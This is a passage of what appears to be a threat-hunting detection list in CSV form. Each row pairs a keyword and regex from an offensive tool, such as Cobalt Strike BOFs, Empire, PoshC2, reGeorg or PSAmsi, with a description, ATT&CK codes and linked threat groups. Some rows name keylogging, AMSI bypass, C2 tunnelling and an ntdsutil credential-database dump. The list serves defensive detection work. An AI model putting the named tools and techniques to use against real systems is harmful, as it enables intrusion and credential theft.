"*Starting PoolParty attack against process id:*",".{0,1000}Starting\sPoolParty\sattack\sagainst\sprocess\sid\:.{0,1000}","offensive_tool_keyword","cobaltstrike","A set of fully-undetectable process injection techniques abusing Windows Thread Pools","T1055","TA0005","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","Defense Evasion","https://github.com/0xEr3bus/PoolPartyBof","1","0","#content","N/A","9","4","380","44","2023-12-21T19:00:20Z","2023-12-11T19:28:20Z","60332"
"*Starting port scan for *",".{0,1000}Starting\sport\sscan\sfor\s.{0,1000}","offensive_tool_keyword","Kubestroyer","Kubestroyer aims to exploit Kubernetes clusters misconfigurations and be the swiss army knife of your Kubernetes pentests","T1588.002 - T1596 - T1552.004","TA0005 - TA0007","N/A","N/A","Exploitation tool","https://github.com/Rolix44/Kubestroyer","1","0","#content","N/A","10","4","359","22","2024-07-26T06:33:00Z","2022-09-15T13:31:21Z","60333"
"*starting RevSocksServer: *",".{0,1000}starting\sRevSocksServer\:\s.{0,1000}","offensive_tool_keyword","revsocks","Cross-platform SOCKS5 proxy server program/library written in C that can also reverse itself over a firewall.","T1572 - T1090 - T1071","TA0001  - TA0010 - TA0011","N/A","Dispossessor","C2","https://github.com/emilarner/revsocks","1","0","#content","https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/iran-apt-seedworm-africa-telecoms","10","10","31","4","2022-08-08T07:59:16Z","2022-03-29T22:12:18Z","60334"
"*Starting socks proxy on : *",".{0,1000}Starting\ssocks\sproxy\son\s\:\s.{0,1000}","offensive_tool_keyword","gTunnel","tunelling solution written in golang","T1573.002 - T1071 - T1090 - T1105 - T1020","TA0005 - TA0010 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hotnops/gTunnel","1","0","#content","N/A","10","10","266","49","2023-05-17T05:24:58Z","2020-03-09T02:52:48Z","60335"
"*Starting socks server * tunnel at *",".{0,1000}Starting\ssocks\sserver\s.{0,1000}\stunnel\sat\s.{0,1000}","offensive_tool_keyword","reGeorg","The successor to reDuh - pwn a bastion webserver and create SOCKS proxies through the DMZ. Pivot and pwn.","T1090 - T1095 - T1572","TA0003 - TA0011","N/A","FIN13 - IRIDIUM - UNC3524 - Worok - COZY BEAR - FANCY BEAR - EMBER BEAR - Sandworm","Data Exfiltration","https://github.com/sensepost/reGeorg","1","0","#content","N/A","N/A","10","3075","826","2025-03-06T09:56:16Z","2014-08-08T00:58:12Z","60336"
"*starting the post exploitation with post exploitation modules*",".{0,1000}starting\sthe\spost\sexploitation\swith\spost\sexploitation\smodules.{0,1000}","offensive_tool_keyword","MetasploitCoop","Post-exploitation collaboration platform based on MSF","T1105 - T1098 - T1104 - T1136","TA0010 - TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x727/MetasploitCoop-Backend","1","0","#content","N/A","10","10","37","8","2021-08-17T10:26:17Z","2021-08-17T07:52:12Z","60338"
"*Starting tor (via systemctl)*",".{0,1000}Starting\stor\s\(via\ssystemctl\).{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","0","#content","N/A","9","8","718","177","2024-05-24T11:51:09Z","2011-12-17T15:14:02Z","60339"
"*Starting Windows-Downdate*",".{0,1000}Starting\sWindows\-Downdate.{0,1000}","offensive_tool_keyword","WindowsDowndate","A tool that takes over Windows Updates to craft custom downgrades and expose past fixed vulnerabilities","T1072 - T1486 - T1505.002 - T1495 - T1499.004","TA0005 - TA0004 - TA0003 ","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/WindowsDowndate","1","0","#content","N/A","10","7","663","88","2024-10-26T10:18:49Z","2024-01-08T19:42:47Z","60340"
"*Starting wstunnel server v*",".{0,1000}Starting\swstunnel\sserver\sv.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","Scattered Spider*","Data Exfiltration","https://github.com/erebe/wstunnel","1","0","#content","N/A","10","10","4759","404","2025-04-15T11:07:11Z","2016-05-14T23:58:43Z","60341"
"*-start-keylogger*",".{0,1000}\-start\-keylogger.{0,1000}","offensive_tool_keyword","gcat","A PoC backdoor that uses Gmail as a C&C server","T1071.001 - T1094 - T1102.002","TA0011 - TA0010 - TA0008","N/A","Sandworm","C2","https://github.com/byt3bl33d3r/gcat","1","0","N/A","N/A","10","10","1332","425","2018-11-16T13:43:15Z","2015-06-03T01:28:00Z","60342"
"*start-keystrokes*",".{0,1000}start\-keystrokes.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","1","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","60343"
"*start-keystrokes-writefile*",".{0,1000}start\-keystrokes\-writefile.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","1","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","60344"
"*Start-MonitorTCPConnections.ps1*",".{0,1000}Start\-MonitorTCPConnections\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1144","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","60345"
"*start-process ntdsutil.exe *create full**",".{0,1000}start\-process\sntdsutil\.exe\s.{0,1000}create\sfull.{0,1000}.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","0","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","60346"
"*Start-ProcessAsUser*",".{0,1000}Start\-ProcessAsUser.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","60347"
"*Start-ProcessAsUser.ps1*",".{0,1000}Start\-ProcessAsUser\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","60348"
"*StartProcessFake(*",".{0,1000}StartProcessFake\(.{0,1000}","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rasta-mouse/TikiTorch","1","0","N/A","N/A","10","10","761","139","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z","60349"
"*Start-PSAmsiClient.ps1*",".{0,1000}Start\-PSAmsiClient\.ps1.{0,1000}","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","1","N/A","N/A","7","4","390","74","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z","60350"
"*Start-PSAmsiServer -*",".{0,1000}Start\-PSAmsiServer\s\-.{0,1000}","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","0","N/A","N/A","7","4","390","74","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z","60351"
"*Start-PSAmsiServer.ps1*",".{0,1000}Start\-PSAmsiServer\.ps1.{0,1000}","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","1","N/A","N/A","7","4","390","74","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z","60352"
"*Start-ReverseSocksProxy *",".{0,1000}Start\-ReverseSocksProxy\s.{0,1000}","offensive_tool_keyword","PowerProxy","PowerShell SOCKS proxy with reverse proxy capabilities","T1090.003 - T1059.001 - T1105","TA0011 - TA0005 - TA0008","N/A","Dispossessor","C2","https://github.com/get-get-get-get/PowerProxy","1","0","N/A","N/A","10","10","80","10","2021-04-23T16:51:28Z","2020-01-03T18:18:58Z","60353"
"*Starts a PSCMD channel on the remote end*",".{0,1000}Starts\sa\sPSCMD\schannel\son\sthe\sremote\send.{0,1000}","offensive_tool_keyword","evilrdp","Th evil twin of aardwolfgui using the aardwolf RDP client library that gives you extended control over the target and additional scripting capabilities from the command line.","T1021.001 - T1056.001 - T1113 - T1078.002 - T1105 - T1090.002 - T1059.001","TA0008 - TA0002 - TA0005 - TA0001 - TA0009 - TA0010 - TA0011","N/A","Black Basta","C2","https://github.com/skelsec/evilrdp","1","0","#content","N/A","10","10","299","31","2025-03-15T13:37:21Z","2023-11-29T13:44:58Z","60356"
"*Starts the godoh C2 server*",".{0,1000}Starts\sthe\sgodoh\sC2\sserver.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","N/A","10","10","779","125","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z","60357"
"*Starts the godoh C2 server*",".{0,1000}Starts\sthe\sgodoh\sC2\sserver.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","N/A","10","10","779","125","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z","60358"
"*Start-SimpleHTTPServer.ps1*",".{0,1000}Start\-SimpleHTTPServer\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","1","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","60360"
"*Start-TCPMonitor*",".{0,1000}Start\-TCPMonitor.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","Start-MonitorTCPConnections.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","60361"
"*startupfolderperistence.py*",".{0,1000}startupfolderperistence\.py.{0,1000}","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1548.002 - T1134.001 - T1087.002 - T1010 - T1547.001 - T1059.001 - T1059.003 - T1059.006 - T1543.003 - T1555.003 - T1555.004 - T1546.001 - T1546.003 - T1546.015 - T1041 - T1083 - T1564.003 - T1562.001 - T1562.003 - T1070 - T1070.004 - T1105 - T1056.001 - T1056.002 - T1556 - T1112 - T1106 - T1046 - T1135 - T1003.001 - T1069.001 - T1069.002 - T1057 - T1055 - T1012 - T1021.003 - T1021.006 - T1018 - T1113 - T1518.001 - T1558.003 - T1082 - T1033 - T1007 - T1124 - T1552.006 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","N/A","10","2239","416","2023-12-06T17:17:24Z","2018-09-25T15:17:30Z","60362"
"*Start-WebcamRecorder.ps1*",".{0,1000}Start\-WebcamRecorder\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","60363"
"*Start-WebServer.ps1*",".{0,1000}Start\-WebServer\.ps1.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","60364"
"*StartWebServiceBeacon*",".{0,1000}StartWebServiceBeacon.{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","0","N/A","N/A","10","10","285","58","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z","60365"
"*static_syscalls_apc_spawn *",".{0,1000}static_syscalls_apc_spawn\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/ajpc500/BOFs","1","0","N/A","N/A","10","10","583","114","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z","60368"
"*static_syscalls_apc_spawn*",".{0,1000}static_syscalls_apc_spawn.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/ajpc500/BOFs","1","1","N/A","N/A","10","10","583","114","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z","60369"
